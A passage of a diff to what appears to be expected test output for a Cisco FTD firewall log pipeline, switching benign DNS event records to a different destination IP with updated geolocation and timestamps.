+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1148,7 +1172,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1189,24 +1213,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1254,7 +1281,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1263,8 +1290,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350959100Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
+ "ingested": "2021-12-09T13:35:02.912999300Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1294,7 +1321,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1336,24 +1363,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 722,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1401,7 +1431,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1410,8 +1440,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350961600Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:35:02.913005400Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1442,7 +1472,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1484,27 +1514,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Seattle",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -122.3303,
- "lat": 47.6109
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 16509,
+ "number": 20712,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "205.251.196.144",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 75,
- "ip": "205.251.196.144",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1552,7 +1582,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "205.251.196.144"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1561,8 +1591,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350964100Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused",
+ "ingested": "2021-12-09T13:35:02.913011300Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1592,7 +1622,7 @@
 "dns_query": "refusedthis.com",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "205.251.196.144",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1626,24 +1656,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 313,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 4
 },
 "dns": {
@@ -1694,7 +1727,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1703,8 +1736,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350966900Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure",
+ "ingested": "2021-12-09T13:35:02.913017500Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1736,7 +1769,7 @@
 "prefilter_policy": "Default Prefilter Policy",
 "nap_policy": "Balanced Security and Connectivity",
 "ingress_zone": "input-zone",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_port": "39541",
 "src_ip": "10.0.1.20",
@@ -1774,23 +1807,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 19281,
+ "number": 20712,
 "organization": {
- "name": "Quad9"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "9.9.9.9",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 180,
- "ip": "9.9.9.9",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1838,7 +1874,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "9.9.9.9"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1847,8 +1883,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350969400Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900",
+ "ingested": "2021-12-09T13:35:02.913025600Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -1878,7 +1914,7 @@
 "dns_query": "laskdfjlaksdf.elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "9.9.9.9",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -1921,23 +1957,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 19281,
+ "number": 20712,
 "organization": {
- "name": "Quad9"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "9.9.9.9",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 108,
- "ip": "9.9.9.9",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -1985,7 +2024,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "9.9.9.9"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -1994,8 +2033,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350971800Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694",
+ "ingested": "2021-12-09T13:35:02.913029600Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2025,7 +2064,7 @@
 "dns_query": "ns-1168.awsdns-18.org",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "9.9.9.9",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -2067,23 +2106,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 19281,
+ "number": 20712,
 "organization": {
- "name": "Quad9"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "9.9.9.9",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 162,
- "ip": "9.9.9.9",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -2131,7 +2173,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "9.9.9.9"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -2140,8 +2182,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350974400Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946",
+ "ingested": "2021-12-09T13:35:02.913034500Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2171,7 +2213,7 @@
 "dns_query": "_http._tcp.security.ubuntu.com",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "9.9.9.9",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -2213,24 +2255,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 199,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -2278,7 +2323,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -2287,8 +2332,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350977Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:35:02.913040500Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2319,7 +2364,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -2361,24 +2406,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -2426,7 +2474,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -2435,8 +2483,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350979500Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
+ "ingested": "2021-12-09T13:35:02.913045Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2466,7 +2514,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -2507,24 +2555,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 166,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -2572,7 +2623,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -2581,8 +2632,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350982Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
+ "ingested": "2021-12-09T13:35:02.913049600Z",
